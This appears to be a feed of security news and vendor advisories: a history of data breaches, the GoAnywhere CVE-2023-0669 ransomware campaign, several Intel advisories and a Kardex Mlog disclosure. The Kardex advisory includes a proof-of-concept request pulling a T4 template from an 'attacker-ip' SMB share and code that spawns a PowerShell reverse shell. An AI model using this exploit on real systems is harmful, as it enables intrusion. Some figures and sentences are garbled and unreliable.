Everything you need to know about the past, present, and future of data security—from Equifax to Yahoo—and the problem with Social Security numbers.

The History of Data Breaches

Data breaches have been increasingly common and harmful for decades. A few stand out, though, as instructive examples of how breaches have evolved, how attackers are able to orchestrate these attacks, what can be stolen, and what happens to data once a breach has occurred.

Digital data breaches started long before widespread use of the internet, yet they were similar in many respects to the leaks we see today. One early landmark incident occurred in 1984, when the credit reporting agency TRW Information Systems (now Experian) realized that one of its database files had been breached. The trove was protected by a numeric passcode that someone lifted from an administrative note at a Sears store and posted on an “electronic bulletin board”—a sort of rudimentary Google Doc that people could access and alter using their landline phone connection. From there, anyone who knew how to view the bulletin board could have used the password to access the data stored in the TRW file: personal data and credit histories of 90 million Americans. The password was exposed for a month. At the time, TRW said that it changed the database password as soon as it found out about the situation. Though the incident is dwarfed by last year’s breach of the credit reporting agency Equifax (discussed below), the TRW lapse was a warning to data firms everywhere—one that many clearly didn’t heed.

Large-scale breaches like the TRW incident occurred sporadically as years went by and the internet matured. By the early 2010s, as mobile devices and the Internet of Things greatly expanded interconnectivity, the problem of data breaches became especially urgent. Stealing username/password pairs or credit card numbers—even breaching a trove of data aggregated from already public sources—could give attackers the keys to someone’s entire online life. And certain breaches in particular helped fuel a growing dark web economy of stolen user data.

One of these incidents was a breach of LinkedIn in 2012 that initially seemed to expose 6.5 million passwords. The data was hashed, or cryptographically scrambled, as a protection to make it unintelligible and therefore difficult to reuse, but hackers quickly started “cracking” the hashes to expose LinkedIn users’ actual passwords. Though LinkedIn itself took precautions to reset impacted account passwords, attackers still got plenty of mileage out of them by finding other accounts around the web where users had reused the same password. That all too common lax password hygiene means a single breach can haunt users for years.

The LinkedIn hack also turned out to be even worse than it first appeared. In 2016 a hacker known as “Peace” started selling account information, particularly email addresses and passwords, from 117 million LinkedIn users. Data stolen from the LinkedIn breach has been repurposed and re-sold by criminals ever since, and attackers still have some success exploiting the data to this day, since so many people reuse the same passwords across numerous accounts for years.

Data breaches didn’t truly become dinner table fodder, though, until the end of 2013 and 2014, when major retailers Target, Neiman Marcus, and Home Depot suffered massive breaches one after the other. The Target hack, first publicly disclosed in December 2013, impacted the personal information (like names, addresses, phone numbers, and email addresses) of 70 million Americans and compromised 40 million credit card numbers. Just a few weeks later, in January 2014, Neiman Marcus admitted that its point-of-sale systems had been hit by the same malware that infected Target, exposing the information of about 110 million Neiman Marcus customers, along with 1.1 million credit and debit card numbers. Then, after months of fallout from those two breaches, Home Depot announced in September 2014 that hackers had stolen 56 million credit and debit card numbers from its systems by installing malware on the company’s payment terminals.

An even more devastating and sinister attack was taking place at the same time, though. The Office of Personnel Management is the administrative and HR department for US government employees. The department manages security clearances, conducts background checks, and keeps records on every past and present federal employee. If you want to know what’s going on inside the US government, this is the department to hack. So China did.

Hackers linked to the Chinese government infiltrated OPM’s network twice, first stealing the technical blueprints for the network in 2013, then initiating a second attack shortly thereafter in which they gained control of the administrative server that managed the authentication for all other server logins. In other words, by the time OPM fully realized what had happened and acted to remove the intruders in 2015, the hackers had been able to steal tens of millions of detailed records about every aspect of federal employees’ lives, including 21.5 million Social Security numbers and 5.6 million fingerprint records. In some cases, victims weren’t even federal employees, but were simply connected in some way to government workers who had undergone background checks. (Those checks include all sorts of extremely specific information, like maps of a subject’s family, friends, associates, and children.)

Data Breaches: The Complete WIRED Guide

Buffer Overflow vulnerability in Saltstack v.3003 and before allows attacker to execute arbitrary code via the func variable in salt/salt/modules/status.py file.

CVE-2021-33226: salt/status.py at master · saltstack/salt

Weeks after an exploit was first announced in a popular cloud-based file transfer service, could some organizations still be vulnerable? The answer is yes.

Last week, the Cybersecurity and Infrastructure Security Agency (CISA) added three new entries to its Known Exploited Vulnerabilities catalog. Among them was CVE-2023-0669, a bug that has paved the way for exploits and follow-on ransomware attacks against hundreds of organizations in recent weeks.

The bug was discovered in GoAnywhere, a Windows-based file-sharing software from Fortra, formerly HelpSystems. According to its website, GoAnywhere is used at more than 3,000 organizations to manage documents of all kinds. According to data from Enlyft, most of those are large organizations — with at least 1,000 and, often, more than 10,000 employees — mostly based in the United States.

The bug tracked as CVE-2023-0669 allows hackers to remotely execute code in target systems, through the internet, without need for authentication. As of this writing, this vulnerability has not yet received an official CVSS rating from the National Vulnerability Database.

But we need not wonder about how dangerous it is, as hackers have already pounced. On Feb. 10 — days after Fortra released a patch — the Clop ransomware gang claimed to have exploited CVE-2023-0669 in over 130 organizations.

After three weeks and counting, it's unclear whether or not more organizations are still at risk.

**Timeline of the GoAnywhere Exploit(s)**

On Feb. 2, two abnormal commands triggered alerts in an IT environment monitored by endpoint detection and response (EDR) vendor Huntress. Both were executed on a host designated for processing transactions on the GoAnywhere platform, though the significance of this wasn't clear yet.

"At first glance, the alert itself was fairly generic," wrote Joe Slowik, threat intelligence manager for Huntress. "But further analysis revealed a more interesting set of circumstances."

An entity on this alerted network had attempted to download a file from a remote resource. Slowik and his colleagues tried to access the file themselves, but by then the port used to download it had been closed up. "We don't really know for certain why," Slowik tells Dark Reading. "It's possible that the adversary was working at a very rapid clip."

They did have the IP address of that entity, however, which traced back to Bulgaria, and was flagged as malicious by VirusTotal. The actor seemed to be from outside of the organization, and had used their first command to download and run a dynamic link library (DLL) file.

"Knowing that the DLL was also executed further raised the risk level of the incident," Slowik says, "since if it was malware that was downloaded, it is now running on the system."

There were other signs, too, that this was a compromise. But even after isolating the relevant server, a second server at the targeted organization became infected. "We were worried that we had a very persistent adversary," Slowik recalls.

The researchers still lacked a copy of the downloaded malware, but all of the evidence surrounding it seemed to accord with activity previously associated with a malware family called Truebot. "The post in the URI structure that was used mapped to earlier Truebot samples," Slowik says. "The DLL exports that were referenced in order to launch the malware, or similar to historical tripod samples, as well as some strings and code structures, all matched. Within the samples themselves, all of it aligned very nicely with what had previously been reported in 2022 for Truebot."

Truebot has been linked to a prolific Russian group called TA505. Notably, TA505 has utilized the ransomware-as-a-service (RaaS) malware "Clop" in previous attacks.

On the same day as Slowik's investigation, reporter Brian Krebs publicly republished an advisory Fortra had sent to its users the day before. GoAnywhere was being exploited, its developers explained, and they were implementing a temporary service outage in response.

Whatever mitigations were taken weren't enough. On Feb. 10, hackers behind the Clop ransomware told Bleeping Computer that they’d used the GoAnywhere exploit to breach over more than organizations.

**How CVE-2023-0669 Works**

CVE-2023-0669 is a cross-site request forgery (CSRF) but that arises from how unpatched GoAnywhere users install their software licenses.

Interestingly, it was as much a design choice as an oversight. "Typically, installing a license involves downloading a license file from a server and uploading it to your device," explains Ron Bowes, lead security researcher for Rapid7, who released the most detailed publicized analysis of how an internal user could trigger the exploit. "Fortra chose to make that whole process transparent, where the license is delivered through the administrator's browser. That means the user gets a much smoother experience."

However, that seamlessness came at a cost. "There is no CSRF protection (and the cookie is not actually required, so no authentication is required to exploit this issue)," Bowes explained in his analysis. "That means that this can, by design, be exploited via cross-site request forgery."

In its report, Rapid7 labeled the exploitability of this vulnerability as "very high."

"While the administration port should not be exposed to the internet," Bowes says, "it's very easy to configure it that way by mistake. And once an attacker understands the vulnerability, it can be exploited without any risk of crashing the application or corrupting data."

Rapid7 also labeled "very high" the value of such an exploit to an attacker. As Bowes explains, "due to the nature of the application (managed file transfer, or MFT), it's common for a GoAnywhere MFT server to sit on a network perimeter and to have the file transfer ports publicly exposed. This makes it a good target for both pivoting into an organization's internal network, and/or stealing potentially sensitive data directly off the target."

On Feb. 6, Fortra fixed CVE-2023-0669 "by adding what they call a 'license request token,'" Bowes explains, "which is included in the encrypted request to Fortra's server. It behaves exactly as a CSRF token would, preventing an attacker from leveraging an administrator's browser."

**What to Do Now**

As severe as the exploit is, only a fraction of GoAnywhere customers are vulnerable to outside hackers through CVE-2023-0669. However, even those without Internet-exposed GoAnywhere instances are still vulnerable to internal users or attackers who have gained initial compromise to a network via regular Web browsers.

The bug can be exploited remotely if an organization’s GoAnywhere administration port — 8000 or 8001 — is exposed on the Internet. As of last week, more than 1,000 GoAnywhere instances were exposed, but, Bleeping Computer explained, only 135 of those pertained to the relevant ports 8000 and 8001. Most of those vulnerable seem to have already been swept up in one big campaign by the Clop group.

"We urgently advise all GoAnywhere MFT customers to apply this patch," Fortra wrote in another advisory to its internal customers. "Particularly for customers running an admin portal exposed to the Internet, we consider this an urgent matter."

Massive GoAnywhere RCE Exploit: Everything You Need to Know

Kardex Mlog MCC version 5.7.12+0-a203c2a213-master suffers from a file inclusion vulnerability that allows for remote code execution.

Remote Code Execution in Kardex MLOG  
=======================================================================  
       Product: Kardex Mlog MCC  
         Vendor: Kardex Holding AG  
      Tested Version: 5.7.12+0-a203c2a213-master  
         Fixed Version: inline patch - no new version number  
         Vulnerability Type: Improper Control of Generation of Code ("RFI") - CWE-94  
     CVSSv2 Severity: AV:A/AC:L/Au:N/C:C/I:C/A:C - Score 8.3  
            CVSSv3 Severity: AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Score 9.6  
            Solution Status: fixed  
  Manufacturer Notification: 2022-12-13  
       Solution Date: 2023-01-24  
   Public Disclosure: 2023-02-07  
       CVE Reference: CVE-2023-22855  
        Authors of Advisory: Patrick Hener & Nico Viakowski

=======================================================================

Vendor description[1]  
---------------------

Kardex Mlog’s modular software solution Kardex Control Center manages material  
flow and warehouse management processes faster and more efficiently.

 From manual block warehouse and interface networking with intelligent partner  
systems to an automated intralogistics system connected to production lines and  
driverless vehicles, intelligent energy management for the automated stacker  
cranes and modern system visualization, the Kardex Control Center modules offer  
flexible solutions for your warehouse management.

Vulnerability Details  
---------------------

The .NET based software spawns a web interface listening on port 8088.  
This interface is meant to control and monitor the material flow.

The user controllable path is handed to a path concatenation function  
(`Path.Combine`) without proper sanitization. This yields the possibility to  
include local files, as well as remote files (SMB). The path is used in a  
function called `getFile`.

The following code snippet shows the vulnerable part of this function:

```cs  
public MccHttpServerResult GetFile(string path, string acceptEncoding, string queryString = null)  
  {  
    MccHttpServerResult result4;

[... snip ...]

else  
{  
  string getfileName = (path == "/") ? "index.html" : path.Substring(1).Replace("/", Path.DirectorySeparatorChar.ToString(CultureInfo.InvariantCulture));  
  string fileName = Path.Combine(this.RootDirectory(), getfileName);  
  string originalFileName = fileName;  
```

The .Net function `Path.Combine` also is able to concatenate remote targets. For  
example using `\\ipaddress` you can include files from a remote samba server.

Further down the request flow, the application is checking for the MIME type of  
the file retrieved.

Depending on the MIME type the content is either sent through a  
import/export procedure or rendered as `mono/t4` template. The function  
`getMimeType` will return `t4` if the included file is ending with an extension  
of `.t4`.

This is where the File Inclusion can be escalated to a Remote Code Execution.  
The `mono/t4` templating engine allows the use of `C#` to evaluate code.  
This enables an attacker to gain code execution and eventually spawn a reverse  
shell.

```cs  
bool flag15 = File.Exists(fileName);  
  if (flag15)  
    {  
    using (FileStream f = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))  
    {  
      byte[] bytes = new byte[f.Length];  
      f.Read(bytes, 0, bytes.Length);  
      bool flag16 = mime2 == "t4";  
      if (flag16)  
        {  
          return this.runTemplatingEngine(bytes, responseHeaders, queryString);  
        }  
```

Proof of Concept (PoC)  
----------------------

The following request will include a remote file from an smb share. For this to  
work the attacker has to spawn an smb server (for example using `smbserver.py`  
from Impacket[2]).

```  
GET /\\attacker-ip/share/exploit.t4 HTTP/1.1  
Host: vulnerable.host.internal:8088  
Content-Type: text/html  
User-Agent: curl/7.86.0  
Accept: */*  
Connection: close  
```

The `exploit.t4` looks like this:

```html  
<#@ template language="C#" #>  
<#@ Import Namespace="System" #>  
<#@ Import Namespace="System.Diagnostics" #>

Proof of Concept - SSTI to RCE  
RCE running ...

<#  
var proc1 = new ProcessStartInfo();  
string anyCommand;  
anyCommand = "powershell -e revshell-base64-blob";

proc1.UseShellExecute = true;  
proc1.WorkingDirectory = @"C:\Windows\System32";  
proc1.FileName = @"C:\Windows\System32\cmd.exe";  
proc1.Verb = "runas";  
proc1.Arguments = "/c "+anyCommand;  
Process.Start(proc1);  
#>

Enjoy your shell, good sir :D  
```

The exploit above will execute `cmd.exe` and launch a `powershell` to execute  
a reverse shell. You can easily generate a reverse shell blob using  
revshells.com[3].

A full exploit spawning a reverse shell was created[4].

Solution  
--------

The user supplied data should be sanitized before using it in the `Path.Combine`  
function.

Disclosure Timeline  
-------------------

2022-12-13: Vulnerability discovered  
2022-12-13: Vulnerability reported to manufacturer  
2023-01-24: Solution provided by manufacturer  
2023-02-07: Public disclosure of vulnerability

References  
----------

[1] Vendor Website:https://www.kardex.com/en/mlog-control-center  
[2] Impacket Git Repository:https://github.com/SecureAuthCorp/impacket  
[3] Reverse Shell Generator:https://www.revshells.com/  
[4] Exploit on Exploit-DB (tbd):https://www.exploit-db.com/exploits/xxxxx    
[5] Blog Post Advisory:https://hesec.de/posts/cve-2023-22855     
[6] Personal Github Repo for Advisory:https://github.com/patrickhener/CVE-2023-22855     
[7] Blog Post Thinking Objects:https://to.com/blog/advisory-kardex-mlog-CVE-2023-22855   

Credits  
-------

This security vulnerability was found by Patrick Hener and Nico Viakowski.

E-Mail:patrickhener@posteo.de  
E-Mail:n.viakowski@pm.me  

Disclaimer  
----------

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible.

Copyright  
---------

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en

Kardex Mlog MCC 5.7.12+0-a203c2a213-master File Inclusion / Remote Code Execution

Incorrect default permissions in some memory controller configurations for some Intel(R) Xeon(R) Processors when using Intel(R) Software Guard Extensions which may allow a privileged user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2023.1 IPU - Intel® Xeon® Processor Advisory**

**Summary: **

A potential security vulnerability in some Intel® Xeon® Processors with Intel® Software Guard Extensions (SGX) may allow escalation of privilege.  Intel is releasing firmware updates to mitigate this potential vulnerability.  
 

**Vulnerability Details:**

CVEID: CVE-2022-33196

Description: Incorrect default permissions in some memory controller configurations for some Intel(R) Xeon(R) Processors when using Intel(R) Software Guard Extensions which may allow a privileged user to potentially enable escalation of privilege via local access. 

CVSS Base Score:  7.2 High

CVSS Vector:  CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N  
 

**Affected Products:**

**Product Collection**

**Vertical Segment**

**CPU ID**

**Platform ID**

3rd Gen Intel® Xeon® Scalable Processor family

Server

606A6

0x87

Intel® Xeon® D Processors

Server

606C1

01

**Recommendations:  
**

Intel is releasing BIOS and microcode updates for the affected processors.

For the mitigation to be effective for Intel® SGX enabled systems, Intel recommends updating the microcode patch located in platform flash designated by firmware interface table (FIT) entry type1.

Details on the microcode loading points can be found at:

https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/secure-coding/loading-microcode-os.html

When the microcode update is applied via the FIT table the BIOS must also be updated.  If the BIOS is not updated to the latest version with the microcode update when Intel® SGX is enabled, the system will hang. Loading this microcode update via the operating system is acceptable but will not provide the mitigation for this Intel® SGX issue.

For non Intel® (SGX) systems the microcode patch can be OS loaded.

Intel has released microcode updates for the affected Intel® Processors that are currently supported on the public github repository. Please see details below on access to the microcode: 

GitHub\*: Public Github: https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files

This CVE requires a Microcode Security Version Number (SVN) update. To address this vulnerability, a SGX TCB recovery is planned, refer here for more information on the SGX TCB recovery process.

**Acknowledgements:**

This issue was found internally by Intel employees in collaboration with external researchers from Google.

Intel would like to thank Cfir Cohen, Erdem Aktas, Felix Wilhelm, James Forshaw and Josh Eads from Google.

Intel would like to thank Nagaraju Kodalapura Nagabhushana Rao, Przemyslaw Duda, Liron Shacham and Ron Anderson from Intel.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

1.1

02/15/2023

Updated Recommendations

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-33196: INTEL-SA-00738

Improper access control in the Intel(R) OFU software before version 14.1.28 may allow an authenticated user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® OFU Software Advisory**

**Summary: **

A potential security vulnerability in the Intel® One Boot Flash Utility (OFU) software may allow denial of service.  Intel is releasing software updates to mitigate this potential vulnerability.  
 

**Vulnerability Details:**

CVE-2021-33104

Description: Improper access control in the Intel(R) OFU software before version 14.1.28 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 6.5 Medium

**Affected Products:**

Intel® OFU software before version 14.1.28.  
 

**Recommendations:**

Intel recommends updating Intel® OFU software to version 14.1.28 or later.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/download/19032/intel-one-boot-flash-update-intel-ofu-utility-for-intel-server-boards-and-intel-server-systems-based-on-intel-62x-chipset.html  
 

**Acknowledgements:**

Intel would like to thank Rajat Gupta, security researcher at SecLab, UC Santa Barbara, USA for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2021-33104: INTEL-SA-00769

Server-side request forgery in the CVAT software maintained by Intel(R) before version 2.0.1 may allow an authenticated user to potentially enable information disclosure via network access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Computer Vision Annotation Tool Advisory**

**Summary: **

A potential security vulnerability in the Computer Vision Annotation Tool (CVAT) software maintained by Intel® may allow information disclosure. Intel is releasing software updates to mitigate this potential vulnerability.  
 

**Vulnerability Details:**

CVEID: CVE-2022-27234

Description: Server-side request forgery in the CVAT software maintained by Intel(R) before version 2.0.1 may allow an authenticated user to potentially enable information disclosure via network access.

CVSS Base Score: 4.3 Medium

**Affected Products:**

CVAT software maintained by Intel® before version 2.0.1.  
 

**Recommendations:**

Intel recommends updating CVAT software maintained by Intel® to version 2.0.1 or later.

Updates are available for download at this location: https://github.com/openvinotoolkit/cvat  
 

**Acknowledgements:**

This issue was found internally by Intel.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-27234: INTEL-SA-00762

Insufficient control flow management in some Intel(R) Ethernet Controller Administrative Tools drivers for Windows before version 1.5.0.2 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Ethernet Controller Administrative Tools Drivers Advisory**

**Summary: **

A potential security vulnerability in some Intel® Ethernet Controller Administrative Tools drivers for Windows may allow escalation of privilege. Intel is releasing software updates to mitigate this potential vulnerability.  
 

**Vulnerability Details:**

CVEID: CVE-2022-27808

Description: Insufficient control flow management in some Intel(R) Ethernet Controller Administrative Tools drivers for Windows before version 1.5.0.2 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.3 Medium

**Affected Products:**

Intel® Ethernet Controller Administrative Tools drivers for Windows before version 1.5.0.2.  
 

**Recommendations:**

Intel recommends updating Intel® Ethernet Controller Administrative Tools drivers for Windows to version 1.5.0.2 or later, which is included for download in the Intel® Administrative Tools for Intel® Network Adapters version 27.6 or later.

Updates are available for download at these locations:

*   Intel® Administrative Tools for Intel® Network Adapters:  
    https://www.intel.sg/content/www/xa/en/download/2593/administrative-tools-for-intel-network-adapters.html.
*   Intel® Ethernet Adapter Complete Driver Pack:  
    https://www.intel.com/content/www/us/en/download/15084/739627/intel-ethernet-adapter-complete-driver-pack.html  
     

**Acknowledgements:**

The issue was found externally.  Intel would like to thank Aobo Wang of Chaitin Security Research Lab (CVE-2022-27808) for reporting the issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-27808: INTEL-SA-00761

Incorrect calculation in microcode keying mechanism for some 3rd Generation Intel(R) Xeon(R) Scalable Processors may allow a privileged user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**3rd Generation Intel® Xeon® Scalable Processors Advisory**

**Summary: **

A potential security vulnerability in some 3rd Generation Intel® Xeon® Scalable Processors may allow information disclosure.  Intel is releasing firmware updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-33972

Description: Incorrect calculation in microcode keying mechanism for some 3rd Generation Intel(R) Xeon(R) Scalable Processors may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 6.1 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:L/A:N

**Affected Products:**

**Product Collection**

**Vertical Segment**

**CPU ID**

**Platform ID**

3rd Gen Intel® Xeon® Scalable processor family

Server

606A6

0x87

**Recommendations:  
**

Intel recommends that users of affected 3rd Generation Intel® Xeon® Scalable Processors update to the latest version of firmware provided by the system manufacturer that addresses these issues. 

Intel has released microcode updates for the affected Intel® Processors that are currently supported on the public github repository. Please see details below on access to the microcode: 

